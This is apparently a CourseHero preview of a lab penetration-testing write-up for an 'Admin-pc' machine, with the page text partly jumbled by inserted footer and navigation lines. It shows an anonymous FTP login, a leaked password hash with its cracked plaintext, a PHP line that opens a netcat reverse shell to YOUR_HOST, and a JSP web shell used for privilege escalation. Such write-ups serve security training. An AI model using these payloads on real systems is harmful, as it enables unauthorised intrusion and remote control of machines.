Software Engineering > DISCUSSION POST > Admin-pc machine (All)

Admin-pc machine

Document Content and Description Below

Admin-pc machine writeup Exploitation Scan the machine using nmap 192.168.x.55 -A One interesting part is the ftp service output Connect to the server and get the xampp config file Use user anonymous with any password 21/tcp open ftp syn-ack ttl 128 | fingerprint-strings: | GenericLines: | 220-Wellcome to Home Ftp Server! | Server ready. | command not understood. | command not understood. | Help: | 220-Wellcome to Home Ftp Server! | Server ready. | 'HELP': command not understood. | NULL, SMBProgNeg: | 220-Wellcome to Home Ftp Server! |_ Server ready. | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeabl |_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeab Posts This study source was downloaded by 100000830919685 from CourseHero.com on 05-15-2022 11:45:49 GMT -05:00 https://www.coursehero.com/file/72266054/192168x55-Admin-pc-machine-writeup-Cyb3rsickpdf/← 192.168.x.161 – Ph33r machine writeup (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/20/192-168- x-161-ph33r-machine-writeup/) 192.168.x.53 – unreal tournament machine writeup → (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/22/192-168- x-53-unreal-tournament-machine-writeup/) the file contain the credentials fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1 Crack the password, you will get the plaintext fm:x-files Now connect to 192.168.x.55:10433/admin which is file manager allowing executable files upload netcat.exe and then upload php file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access Escalation Upload jsp shell file to c:/xampp/tomcat/webapps/examples then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami And you’re an admin [root:~/Desktop]# ftp ftp> o (to) 192.168.x.55 Connected to 192.168.x.55. 220-Wellcome to Home Ftp Server! 220 Server ready. Name (192.168.x.55:root): anonymous 331 Password required for anonymous. Password: 230 User Anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files.

[Show More]

Last updated: 3 years ago

Preview 1 out of 5 pages

Buy Now

Instant download

We Accept: